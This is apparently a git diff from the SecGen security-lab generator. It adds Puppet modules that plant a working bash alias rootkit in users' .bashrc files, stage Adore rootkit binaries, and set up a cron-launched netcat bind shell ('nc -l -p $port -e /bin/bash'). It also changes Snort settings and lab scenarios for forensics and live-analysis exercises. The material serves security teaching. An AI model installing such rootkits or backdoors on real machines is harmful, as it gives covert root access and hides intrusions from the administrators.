diff --git a/modules/utilities/unix/audit_tools/binary_tools/manifests/install.pp b/modules/utilities/unix/audit_tools/binary_tools/manifests/install.pp
new file mode 100644
index 000000000..2d5f8e3dc
--- /dev/null
+++ b/modules/utilities/unix/audit_tools/binary_tools/manifests/install.pp
@@ -0,0 +1,5 @@
+class binary_tools::install{
+ package { ['binutils']:
+ ensure => 'installed',
+ }
+}
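The `binutils` package installed by this manifest supplies the core binary-analysis commands (`strings`, `objdump`, `nm`, and so on) that the audit labs lean on. As a minimal sketch of the most common first step, extracting printable strings from a suspect binary (the file path and the `world-marker` string are made up for the demo; assumes `binutils` is installed):

```shell
# Hypothetical example: pull printable strings out of a binary blob.
# /tmp/suspect.bin and "world-marker" are illustrative values only.
printf 'AAAA\000\001world-marker\000BBBB' > /tmp/suspect.bin
strings /tmp/suspect.bin      # prints the human-readable fragments
rm -f /tmp/suspect.bin
```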
diff --git a/modules/utilities/unix/audit_tools/binary_tools/secgen_metadata.xml b/modules/utilities/unix/audit_tools/binary_tools/secgen_metadata.xml
new file mode 100644
index 000000000..14375d25e
--- /dev/null
+++ b/modules/utilities/unix/audit_tools/binary_tools/secgen_metadata.xml
@@ -0,0 +1,14 @@
+
+
+
+ Binary tools
+ Z. Cliffe Schreuders
+ Apache v2
+ Installs a collection of tools for binary analysis
+
+ audit_tools
+ linux
+
+
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/adore_rootkit_static.pp b/modules/utilities/unix/compromised/adore_rootkit_static/adore_rootkit_static.pp
new file mode 100644
index 000000000..0c4a1da36
--- /dev/null
+++ b/modules/utilities/unix/compromised/adore_rootkit_static/adore_rootkit_static.pp
@@ -0,0 +1 @@
+include adore_rootkit_static::install
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/files/ls b/modules/utilities/unix/compromised/adore_rootkit_static/files/ls
new file mode 100755
index 000000000..f15873f66
Binary files /dev/null and b/modules/utilities/unix/compromised/adore_rootkit_static/files/ls differ
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/files/netstat b/modules/utilities/unix/compromised/adore_rootkit_static/files/netstat
new file mode 100755
index 000000000..d39385f62
Binary files /dev/null and b/modules/utilities/unix/compromised/adore_rootkit_static/files/netstat differ
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/files/ps b/modules/utilities/unix/compromised/adore_rootkit_static/files/ps
new file mode 100755
index 000000000..704ac2dbb
Binary files /dev/null and b/modules/utilities/unix/compromised/adore_rootkit_static/files/ps differ
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/manifests/install.pp b/modules/utilities/unix/compromised/adore_rootkit_static/manifests/install.pp
new file mode 100644
index 000000000..e3ff3bc9d
--- /dev/null
+++ b/modules/utilities/unix/compromised/adore_rootkit_static/manifests/install.pp
@@ -0,0 +1,27 @@
+class adore_rootkit_static::install {
+
+ # TODO: rootkit configuration
+ # $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+ # $hidden_ports = join($secgen_parameters['hidden_ports'], "\|")
+ # $hidden_strings = join($secgen_parameters['hidden_strings'], "\|")
+
+ file { '/bin/ls_a':
+ source => 'puppet:///modules/adore_rootkit_static/ls',
+ mode => '0755',
+ owner => 'root',
+ group => 'root',
+ }
+ file { '/bin/netstat_a':
+ source => 'puppet:///modules/adore_rootkit_static/netstat',
+ mode => '0755',
+ owner => 'root',
+ group => 'root',
+ }
+ file { '/bin/ps_a':
+ source => 'puppet:///modules/adore_rootkit_static/ps',
+ mode => '0755',
+ owner => 'root',
+ group => 'root',
+ }
+
+}
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/secgen_metadata.xml b/modules/utilities/unix/compromised/adore_rootkit_static/secgen_metadata.xml
new file mode 100644
index 000000000..4d2c2ed51
--- /dev/null
+++ b/modules/utilities/unix/compromised/adore_rootkit_static/secgen_metadata.xml
@@ -0,0 +1,30 @@
+
+
+
+ Adore rootkit binaries
+ Z. Cliffe Schreuders
+ MIT
+ Some static rootkit binaries from the Adore rootkit. (Not compiled by SecGen.)
+
+
+ rootkit
+ userspace_rootkit
+ linux
+
+
+
+
+
+
diff --git a/modules/utilities/unix/compromised/alias_rootkit/alias_rootkit.pp b/modules/utilities/unix/compromised/alias_rootkit/alias_rootkit.pp
new file mode 100644
index 000000000..e9098cbd7
--- /dev/null
+++ b/modules/utilities/unix/compromised/alias_rootkit/alias_rootkit.pp
@@ -0,0 +1 @@
+include alias_rootkit::install
diff --git a/modules/utilities/unix/compromised/alias_rootkit/manifests/install.pp b/modules/utilities/unix/compromised/alias_rootkit/manifests/install.pp
new file mode 100644
index 000000000..ac1d190b6
--- /dev/null
+++ b/modules/utilities/unix/compromised/alias_rootkit/manifests/install.pp
@@ -0,0 +1,24 @@
+class alias_rootkit::install {
+
+ $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+ $hidden_ports = join($secgen_parameters['hidden_ports'], "\|")
+ $hidden_strings = join($secgen_parameters['hidden_strings'], "\|")
+
+ $aliases = "alias ps='f(){ ps \"$@\" |grep -v \"$hidden_strings\"; unset -f f; }; f'; alias ls='f(){ ls \"$@\" |grep -v \"$hidden_strings\" |column -c 80; unset -f f; }; f'; alias lsof='f(){ lsof \"$@\" |grep -v \"$hidden_strings\"; unset -f f; }; f'; alias netstat='f(){ netstat \"$@\" |grep -v \"$hidden_strings\|$hidden_ports\"; unset -f f; }; f'; alias cat='f(){ cat \"$@\" |grep -v \"$hidden_strings\|alias\"; unset -f f; }; f'; alias sudo='sudo_w'; sudo_w() { if [[ \"\$1\" =~ ^ls|/bin/ls|^ps|/bin/ps|^netstat|/bin/netstat|^lsof|/bin/lsof|^cat|/bin/cat ]]; then command sudo \$1 \"\${@:2}\" |grep -v \"$hidden_strings\|$hidden_ports\"; else command sudo \"$@\"; fi; }; alias alias='true'; shopt -s expand_aliases"
+ $skip_non_interactive = " *) return;;"
+
+ file_line { 'Append a line to /etc/skel/.bashrc':
+ path => '/etc/skel/.bashrc',
+ line => $aliases,
+ }
+ file_line { 'Append a line to /root/.bashrc':
+ path => '/root/.bashrc',
+ line => $aliases,
+ }
+ file_line { 'Remove a line from /etc/skel/.bashrc':
+ path => '/etc/skel/.bashrc',
+ line => $skip_non_interactive,
+ ensure => absent,
+ }
+
+}
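The long `$aliases` string above boils down to one repeated trick: wrap each command in a throwaway shell function so its arguments pass through unchanged, pipe the real command through `grep -v` to drop any line matching the hidden strings, then unset the function. A minimal sketch of the pattern in isolation (the `hideme` marker mirrors the module's default `hidden_strings` input; everything else is illustrative):

```shell
#!/bin/bash
# Sketch of the alias-rootkit filtering trick; "hideme" is the module default.
shopt -s expand_aliases   # aliases normally expand only in interactive shells
hidden="hideme"

# A temporary function f forwards "$@" to the real command, filters its
# output, then removes itself.
alias ls='f(){ command ls "$@" | grep -v "'"$hidden"'"; unset -f f; }; f'

demo=$(mktemp -d)
touch "$demo/visible.txt" "$demo/hideme.txt"
ls "$demo"                # hideme.txt no longer appears in the listing
rm -rf "$demo"
```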
diff --git a/modules/utilities/unix/compromised/alias_rootkit/secgen_metadata.xml b/modules/utilities/unix/compromised/alias_rootkit/secgen_metadata.xml
new file mode 100644
index 000000000..e06fd5cfa
--- /dev/null
+++ b/modules/utilities/unix/compromised/alias_rootkit/secgen_metadata.xml
@@ -0,0 +1,29 @@
+
+
+
+ Alias rootkit
+ Z. Cliffe Schreuders
+ MIT
+ A new simple bash-based rootkit based on using aliases to hide output from commands.
+ This module has to be included in the scenario BEFORE accounts are created, since it modifies all user accounts via /etc/skel.
+
+
+ rootkit
+ userspace_rootkit
+ linux
+
+ hidden_ports
+ hidden_strings
+
+
+ 4444
+ 12345
+
+
+ hideme
+ hme
+
+
+
diff --git a/modules/utilities/unix/compromised/dead_image/dead_image.pp b/modules/utilities/unix/compromised/dead_image/dead_image.pp
new file mode 100644
index 000000000..06f087323
--- /dev/null
+++ b/modules/utilities/unix/compromised/dead_image/dead_image.pp
@@ -0,0 +1 @@
+include dead_image::install
diff --git a/modules/utilities/unix/compromised/dead_image/manifests/install.pp b/modules/utilities/unix/compromised/dead_image/manifests/install.pp
new file mode 100644
index 000000000..366a805e2
--- /dev/null
+++ b/modules/utilities/unix/compromised/dead_image/manifests/install.pp
@@ -0,0 +1,16 @@
+class dead_image::install {
+
+ # $url_path = "http://z.cliffe.schreuders.org/files/6543367533"
+ $url_path = "http://hacktivity.aet.leedsbeckett.ac.uk/files"
+ file { '/root/evidence/':
+ ensure => 'directory'
+ } ->
+ # This file is too large (and binary) to sensibly include in the git repo
+ file { '/root/evidence/hda1.img':
+ source => "$url_path/hda1.img"
+ } ->
+ file { '/root/evidence/md5s':
+ source => "$url_path/md5s"
+ }
+
+}
diff --git a/modules/utilities/unix/compromised/dead_image/secgen_metadata.xml b/modules/utilities/unix/compromised/dead_image/secgen_metadata.xml
new file mode 100644
index 000000000..03c2e76c1
--- /dev/null
+++ b/modules/utilities/unix/compromised/dead_image/secgen_metadata.xml
@@ -0,0 +1,15 @@
+
+
+
+ Dead HDD image
+ Z. Cliffe Schreuders
+ MIT
+ A disk image taken from a compromised Redhat 7.2 system (from the Honeynet Project). This module drops the image in /root/evidence/
+
+
+ forensic_artifact
+ linux
+
+
diff --git a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
index 9a56c4501..eff364ac9 100644
--- a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
+++ b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
@@ -209,7 +209,7 @@ def read_bots (irc_server_ip_address)
end
if quiz != nil
- correct_answer = quiz['answer']
+ correct_answer = quiz['answer'].clone
if bots[bot_name]['attacks'][current].key?('post_command_output')
correct_answer.gsub!(/{{post_command_output}}/, (bots[bot_name]['attacks'][current]['post_command_output']||''))
end
@@ -220,6 +220,7 @@ def read_bots (irc_server_ip_address)
correct_answer.gsub!(/{{pre_shell_command_output_first_line}}/, (bots[bot_name]['attacks'][current]['get_shell_command_output']||'').split("\n").first)
end
correct_answer.chomp!
+ Print.debug "#{correct_answer}====#{answer}"
if answer.match(/#{correct_answer}/i)
m.reply bots[bot_name]['messages']['correct_answer']
diff --git a/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png b/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png
index a379d9de8..49fabb696 100644
Binary files a/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png and b/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png differ
diff --git a/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp b/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp
index 23f281640..59ea2bcdf 100644
--- a/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp
+++ b/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp
@@ -9,9 +9,15 @@ class pidgin::config {
$accounts.each |$raw_account| {
$account = parsejson($raw_account)
$username = $account['username']
- $conf_dir = "/home/$username/.purple"
+ # set home directory
+ if $username == 'root' {
+ $home_dir = "/root"
+ } else {
+ $home_dir = "/home/$username"
+ }
+ $conf_dir = "$home_dir/.purple"
- file { ["/home/$username/",
+ file { ["$home_dir/",
"$conf_dir",
"$conf_dir/smileys/",
"$conf_dir/icons/",
@@ -57,13 +63,13 @@ class pidgin::config {
# autostart script
if $autostart {
- file { ["/home/$username/.config/", "/home/$username/.config/autostart/"]:
+ file { ["$home_dir/.config/", "$home_dir/.config/autostart/"]:
ensure => directory,
owner => $username,
group => $username,
}
- file { "/home/$username/.config/autostart/pidgin.desktop":
+ file { "$home_dir/.config/autostart/pidgin.desktop":
ensure => file,
source => 'puppet:///modules/pidgin/pidgin.desktop',
owner => $username,
diff --git a/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb~upstream_stretch_kde_update b/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb~upstream_stretch_kde_update
new file mode 100644
index 000000000..22d5d689f
--- /dev/null
+++ b/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb~upstream_stretch_kde_update
@@ -0,0 +1,8 @@
+#This file is generated by ModuleSync, do not edit.
+require 'puppetlabs_spec_helper/module_spec_helper'
+
+# put local configuration and setup into spec_helper_local
+begin
+ require 'spec_helper_local'
+rescue LoadError
+end
diff --git a/modules/utilities/unix/monitoring_ids/snort/manifests/config.pp b/modules/utilities/unix/monitoring_ids/snort/manifests/config.pp
new file mode 100644
index 000000000..c40e8a68f
--- /dev/null
+++ b/modules/utilities/unix/monitoring_ids/snort/manifests/config.pp
@@ -0,0 +1,17 @@
+class snort::config{
+
+ file { '/etc/snort/snort.debian.conf':
+ ensure => present,
+ owner => 'root',
+ group => 'root',
+ mode => '0777',
+ content => template('snort/snort.debian.conf.erb')
+ }
+
+ # enable the alerts file output
+ file_line { 'Append a line to /etc/snort/snort.conf':
+ path => '/etc/snort/snort.conf',
+ line => 'output alert_fast',
+ }
+
+}
diff --git a/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp b/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp
index fcce33972..8711637bb 100644
--- a/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp
+++ b/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp
@@ -1,5 +1,15 @@
-class snort::install{
- package { ['snort']:
- ensure => 'installed',
+class snort::install {
+
+ # install rules and config via debian repo
+ package { ['snort-rules-default','snort-common']:
+ ensure => installed,
+ } ->
+
+ # force it not to be enabled, because the interface named in the config may be wrong
+ exec { 'install snort':
+ path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ],
+ command => '/bin/true',
+ provider => shell,
+ onlyif => 'apt-get install -y snort; systemctl disable snort',
}
}
diff --git a/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp b/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp
index ccb5b54eb..3a9094922 100644
--- a/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp
+++ b/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp
@@ -1,5 +1,2 @@
class snort::service{
- service { 'snort':
- ensure => running
- }
-}
\ No newline at end of file
+}
diff --git a/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml b/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml
index 71f149cb9..967d52c51 100644
--- a/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml
+++ b/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml
@@ -12,8 +12,9 @@
linux
-
- .*Stretch.*
-
+
+
+ update
+
diff --git a/modules/utilities/unix/monitoring_ids/snort/snort.pp b/modules/utilities/unix/monitoring_ids/snort/snort.pp
index 09b26fc86..2c2b7b6f2 100644
--- a/modules/utilities/unix/monitoring_ids/snort/snort.pp
+++ b/modules/utilities/unix/monitoring_ids/snort/snort.pp
@@ -1,2 +1,3 @@
include snort::install
+include snort::config
include snort::service
diff --git a/modules/utilities/unix/monitoring_ids/snort/templates/snort.debian.conf.erb b/modules/utilities/unix/monitoring_ids/snort/templates/snort.debian.conf.erb
new file mode 100644
index 000000000..5ec272531
--- /dev/null
+++ b/modules/utilities/unix/monitoring_ids/snort/templates/snort.debian.conf.erb
@@ -0,0 +1,25 @@
+# snort.debian.config (Debian Snort configuration file)
+#
+# This file was generated by the post-installation script of the snort
+# package using values from the debconf database.
+#
+# It is used for options that are changed by Debian to leave
+# the original configuration files untouched.
+#
+# This file is automatically updated on upgrades of the snort package
+# *only* if it has not been modified since the last upgrade of that package.
+#
+# If you have edited this file but would like it to be automatically updated
+# again, run the following command as root:
+# dpkg-reconfigure snort
+
+DEBIAN_SNORT_STARTUP="boot"
+DEBIAN_SNORT_HOME_NET="any"
+DEBIAN_SNORT_OPTIONS=""
+
+# oVirt uses ens3, change this if it's not the name of your interface
+DEBIAN_SNORT_INTERFACE="ens3"
+
+DEBIAN_SNORT_SEND_STATS="true"
+DEBIAN_SNORT_STATS_RCPT="root"
+DEBIAN_SNORT_STATS_THRESHOLD="1"
diff --git a/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp b/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp
index e1c261119..bf8af4ea5 100644
--- a/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp
+++ b/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp
@@ -9,16 +9,22 @@ class iceweasel::config {
$accounts.each |$raw_account| {
$account = parsejson($raw_account)
$username = $account['username']
+ # set home directory
+ if $username == 'root' {
+ $home_dir = "/root"
+ } else {
+ $home_dir = "/home/$username"
+ }
# add user profile
- file { ["/home/$username/", "/home/$username/.mozilla/",
- "/home/$username/.mozilla/firefox",
- "/home/$username/.mozilla/firefox/user.default"]:
+ file { ["$home_dir/", "$home_dir/.mozilla/",
+ "$home_dir/.mozilla/firefox",
+ "$home_dir/.mozilla/firefox/user.default"]:
ensure => directory,
owner => $username,
group => $username,
}->
- file { "/home/$username/.mozilla/firefox/profiles.ini":
+ file { "$home_dir/.mozilla/firefox/profiles.ini":
ensure => file,
source => 'puppet:///modules/iceweasel/profiles.ini',
owner => $username,
@@ -26,7 +32,7 @@ class iceweasel::config {
}->
# set start page via template:
- file { "/home/$username/.mozilla/firefox/user.default/user.js":
+ file { "$home_dir/.mozilla/firefox/user.default/user.js":
ensure => file,
content => template('iceweasel/user.js.erb'),
owner => $username,
@@ -35,14 +41,14 @@ class iceweasel::config {
# autostart script
if $autostart {
- file { ["/home/$username/.config/", "/home/$username/.config/autostart/"]:
+ file { ["$home_dir/.config/", "$home_dir/.config/autostart/"]:
ensure => directory,
owner => $username,
group => $username,
- require => File["/home/$username/"],
+ require => File["$home_dir/"],
}
- file { "/home/$username/.config/autostart/iceweasel.desktop":
+ file { "$home_dir/.config/autostart/iceweasel.desktop":
ensure => file,
source => 'puppet:///modules/iceweasel/iceweasel.desktop',
owner => $username,
diff --git a/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml b/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml
index 95b6b8ecd..30b78f65a 100644
--- a/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml
+++ b/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml
@@ -45,4 +45,8 @@
distcc
-
\ No newline at end of file
+
+ update
+
+
+
diff --git a/modules/vulnerabilities/unix/misc/nc_backdoor/manifests/install.pp b/modules/vulnerabilities/unix/misc/nc_backdoor/manifests/install.pp
new file mode 100644
index 000000000..39c3952b5
--- /dev/null
+++ b/modules/vulnerabilities/unix/misc/nc_backdoor/manifests/install.pp
@@ -0,0 +1,28 @@
+class nc_backdoor::install {
+ # package { 'nc':
+ # ensure => installed
+ # }
+
+ $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+ $port = $secgen_parameters['port'][0]
+
+ $strings_to_leak = $secgen_parameters['strings_to_leak']
+ $leaked_filenames = $secgen_parameters['leaked_filenames']
+
+
+ # run on each boot via cron
+ cron { 'backdoor':
+ command => "nc -l -p $port -e /bin/bash",
+ special => 'reboot',
+ }
+
+ ::secgen_functions::leak_files { "root-file-leak":
+ storage_directory => "/root/",
+ leaked_filenames => $leaked_filenames,
+ strings_to_leak => $strings_to_leak,
+ owner => root,
+ group => root,
+ mode => '0600',
+ leaked_from => "accounts_root",
+ }
+}
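The `cron { 'backdoor': special => 'reboot' }` resource above amounts to an `@reboot` crontab entry that restarts the bind shell on every boot, which is exactly the kind of persistence a live-analysis pass should look for. A sketch of a simple check (the `nc -l -p` signature matches this module's own command; port 4444 is just an example value, and a real rootkit would try to hide the entry):

```shell
# Sketch: scan a crontab dump for the netcat bind-shell line this module
# installs (@reboot nc -l -p <port> -e /bin/bash). In the lab you would feed
# it the output of `crontab -l` as root; here the dump is simulated.
crontab_dump='@reboot nc -l -p 4444 -e /bin/bash'
if printf '%s\n' "$crontab_dump" | grep -Eq '@reboot.*nc -l -p [0-9]+'; then
  echo "possible netcat bind-shell persistence"
fi
```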
diff --git a/modules/vulnerabilities/unix/misc/nc_backdoor/nc_backdoor.pp b/modules/vulnerabilities/unix/misc/nc_backdoor/nc_backdoor.pp
new file mode 100644
index 000000000..34e9b682b
--- /dev/null
+++ b/modules/vulnerabilities/unix/misc/nc_backdoor/nc_backdoor.pp
@@ -0,0 +1 @@
+include nc_backdoor::install
diff --git a/modules/vulnerabilities/unix/misc/nc_backdoor/secgen_metadata.xml b/modules/vulnerabilities/unix/misc/nc_backdoor/secgen_metadata.xml
new file mode 100644
index 000000000..5d8b09d9d
--- /dev/null
+++ b/modules/vulnerabilities/unix/misc/nc_backdoor/secgen_metadata.xml
@@ -0,0 +1,49 @@
+
+
+
+ Netcat Backdoor
+ Z. Cliffe Schreuders
+ MIT
+ A netcat backdoor (acts as a bind shell -- listens on a port and serves a shell).
+
+ simple_backdoor
+ bind_shell
+ root_rwx
+ remote
+ unix
+
+ port
+ strings_to_leak
+ leaked_filenames
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ low
+ 10
+ AV:N/AC:L/Au:N/C:C/I:C/A:C
+ nc
+
+
+ Connect to a port
+ Simply connecting to the right port will give you a root shell.
+
+
+ update
+
+
+
diff --git a/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml b/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml
index 39112f414..d53e25dbb 100644
--- a/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml
+++ b/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml
@@ -38,4 +38,7 @@
-
\ No newline at end of file
+
+ update
+
+
diff --git a/scenarios/examples/services_utilities_examples/snort.xml b/scenarios/examples/services_utilities_examples/snort.xml
new file mode 100644
index 000000000..d9b8bc320
--- /dev/null
+++ b/scenarios/examples/services_utilities_examples/snort.xml
@@ -0,0 +1,59 @@
+
+
+
+
+
+ ids_snoop
+
+
+
+ 172.16.0.2
+
+
+
+
+
+
+
+ mythical_creatures
+
+
+
+
+ tiaspbiqe2r
+
+
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+ accounts
+
+
+
+
+
+
+
+
+ IP_addresses
+
+
+
+
+
+
+
+
diff --git a/scenarios/labs/3_backups_and_recovery.xml b/scenarios/labs/3_backups_and_recovery.xml
index 9a055310e..7c4600dcf 100644
--- a/scenarios/labs/3_backups_and_recovery.xml
+++ b/scenarios/labs/3_backups_and_recovery.xml
@@ -6,7 +6,7 @@
Backups labZ. Cliffe Schreuders
- A Hackerbot lab. Work through the labsheet, then when prompted interact with Hackerbot.
+ A Hackerbot lab. Work through the labsheet, then when prompted interact with Hackerbot. Topics covered: Rsync, and backups and restoring data using differential and incremental backups.ctf-labhackerbot-lab
@@ -171,8 +171,8 @@
- server
-
+ backup_server
+
@@ -187,7 +187,7 @@
-
+
@@ -197,7 +197,7 @@
- hb_server
+ hackerbot_server
diff --git a/scenarios/labs/4_ids.xml b/scenarios/labs/4_ids.xml
index 140683916..77b4de8f8 100644
--- a/scenarios/labs/4_ids.xml
+++ b/scenarios/labs/4_ids.xml
@@ -155,7 +155,7 @@
- ids_server
+ ids_snoop
@@ -195,7 +195,7 @@
web_server
-
+
@@ -209,7 +209,7 @@
-
+
+
@@ -209,7 +210,7 @@
-
+
diff --git a/scenarios/labs/8_exfiltration_detection.xml b/scenarios/labs/6_exfiltration_detection.xml
similarity index 97%
rename from scenarios/labs/8_exfiltration_detection.xml
rename to scenarios/labs/6_exfiltration_detection.xml
index e5691410e..464912594 100644
--- a/scenarios/labs/8_exfiltration_detection.xml
+++ b/scenarios/labs/6_exfiltration_detection.xml
@@ -182,7 +182,7 @@
- ids_server
+ ids_snoop
@@ -222,7 +222,7 @@
web_server
-
+
@@ -232,8 +232,7 @@
-
-
+
diff --git a/scenarios/labs/6_live_analysis.xml b/scenarios/labs/7_live_analysis.xml
similarity index 56%
rename from scenarios/labs/6_live_analysis.xml
rename to scenarios/labs/7_live_analysis.xml
index a011f3f44..adaa3ac37 100644
--- a/scenarios/labs/6_live_analysis.xml
+++ b/scenarios/labs/7_live_analysis.xml
@@ -17,21 +17,28 @@
desktop
-
-
- 172.16.0.2
- 172.16.0.3
+
+
+
+ mythical_creatures
+
+
-
+
+
+ 172.16.0.2
+
+ 172.16.0.3
+
+ 172.16.0.4
+
+
+
-
-
- mythical_creatures
-
-
+ main_usernametiaspbiqe2r
@@ -39,54 +46,6 @@
true
-
-
-
-
-
-
-
-
-
-
-
- mythical_creatures
-
-
-
-
- test
-
-
- false
-
-
-
-
-
-
-
-
-
-
-
-
- mythical_creatures
-
-
-
-
- test
-
-
- false
-
-
-
-
-
-
-
@@ -113,6 +72,7 @@
+
@@ -149,6 +109,98 @@
+
+ compromised_server
+
+
+
+
+
+
+
+
+
+ main_username
+
+
+ tiaspbiqe2r
+
+
+ true
+
+
+ u_r_powned-hme
+ .a_hidden_flag-hme
+ hidden_string
+
+
+
+
+ powned_messages
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ nc_port
+
+
+ nc
+ hme
+ hidden_string
+
+
+
+
+
+
+
+
+
+
+ accounts_compromised
+
+
+
+
+
+
+
+
+
+
+
+
+
+ hackerbot_access_root_password
+
+
+
+
+
+ IP_addresses
+
+
+
+
+
hackerbot_server
@@ -163,7 +215,7 @@
-
+ accounts
@@ -174,6 +226,15 @@
IP_addresses
+
+ IP_addresses
+
+
+ nc_port
+
+
+ hidden_string
+
@@ -190,4 +251,5 @@
+
diff --git a/scenarios/labs/7_dead_analysis.xml b/scenarios/labs/8_dead_analysis.xml
similarity index 87%
rename from scenarios/labs/7_dead_analysis.xml
rename to scenarios/labs/8_dead_analysis.xml
index 3dcc73abf..c745c6f2c 100644
--- a/scenarios/labs/7_dead_analysis.xml
+++ b/scenarios/labs/8_dead_analysis.xml
@@ -17,7 +17,6 @@
desktop
-
172.16.0.2172.16.0.3
@@ -164,7 +163,7 @@
-
+ accounts
@@ -195,10 +194,37 @@
kali
+
+ {"username":"root","password":"toor","super_user":"","strings_to_leak":[],"leaked_filenames":[]}
+
+
+
+
+
+
+
+ kali_root_account
+
+
+ true
+
+
+ IP_addresses
+
+
+
+
+
+ IP_addresses
+
+
+ kali_root_account
+
+
diff --git a/scenarios/labs/hacker_vs_hackerbot_1.xml b/scenarios/labs/hacker_vs_hackerbot_1.xml
index 2383990d8..e23dc3cf1 100644
--- a/scenarios/labs/hacker_vs_hackerbot_1.xml
+++ b/scenarios/labs/hacker_vs_hackerbot_1.xml
@@ -4,7 +4,7 @@
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
- Hacker vs hacker 1
+ Hacker vs Hackerbot 1Z. Cliffe SchreudersA Hackerbot test.
@@ -14,7 +14,7 @@
desktop
-
+ 172.16.0.2
@@ -37,7 +37,7 @@
-
+ tiaspbiqe2rtrue
@@ -79,7 +79,7 @@
-
+ tiaspbiqe2rfalse
@@ -126,6 +126,9 @@
+
+ accounts
+
accounts
@@ -175,7 +178,8 @@
backup_server
-
+
+
diff --git a/scenarios/labs/hacker_vs_hackerbot_2.xml b/scenarios/labs/hacker_vs_hackerbot_2.xml
index a30994075..cddedb309 100644
--- a/scenarios/labs/hacker_vs_hackerbot_2.xml
+++ b/scenarios/labs/hacker_vs_hackerbot_2.xml
@@ -4,7 +4,7 @@
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
- Hacker vs hacker 2
+ Hacker vs Hackerbot 2Z. Cliffe SchreudersA Hackerbot test.
@@ -14,13 +14,14 @@
desktop
-
+ 172.16.0.2172.16.0.3172.16.0.4172.16.0.5
+ 172.16.0.6
@@ -30,7 +31,7 @@
-
+
mythical_creatures
@@ -38,7 +39,7 @@
-
+ tiaspbiqe2rtrue
@@ -136,6 +137,9 @@
+
+ accounts
+
accounts
@@ -183,8 +187,8 @@
- ids_server
-
+ ids_snoop
+
@@ -247,7 +251,7 @@
web_server
-
+
@@ -308,6 +312,9 @@
IP_addresses
+
+ IP_addresses
+
IP_addresses
@@ -328,4 +335,69 @@
+
+
+ compromised_server
+
+
+
+
+
+
+
+
+
+ main_username
+
+
+ tiaspbiqe2r
+
+
+ true
+
+
+ u_r_powned-hme
+ .hidden_flag-hme
+ hidden_string
+
+
+
+
+ powned_messages
+
+
+
+
+
+
+
+
+
+
+
+ nc
+ hme
+ hidden_string
+
+
+
+
+
+ accounts_compromised
+
+
+
+
+
+ hackerbot_access_root_password
+
+
+
+
+
+ IP_addresses
+
+
+
+
diff --git a/scenarios/security_audit/team_project.xml b/scenarios/security_audit/team_project.xml
index 2061cd0c1..77aef4071 100644
--- a/scenarios/security_audit/team_project.xml
+++ b/scenarios/security_audit/team_project.xml
@@ -17,13 +17,14 @@
web_server
-
+ 172.10.0.1172.10.0.2172.10.0.3172.10.0.4
+ 172.10.0.5
@@ -78,7 +79,7 @@
intranet_server
-
+
@@ -174,7 +175,8 @@
desktop
-
+
+
@@ -198,7 +200,17 @@
- attack_vm
+ attack_vm_1
+
+
+
+ IP_addresses
+
+
+
+
+
+ attack_vm_2
diff --git a/scenarios/test_scenario.xml b/scenarios/test_scenario.xml
index 25e29f3b1..9316d6e6e 100644
--- a/scenarios/test_scenario.xml
+++ b/scenarios/test_scenario.xml
@@ -6,16 +6,14 @@
- gitlist
-
+ test_stanif_clone
+ 172.16.0.2172.16.0.3
-
-
IP_addresses
@@ -24,14 +22,4 @@
-
- desktop
-
-
-
- IP_addresses
-
-
-
-
diff --git a/secgen.rb b/secgen.rb
index f6141d45e..f52637e72 100644
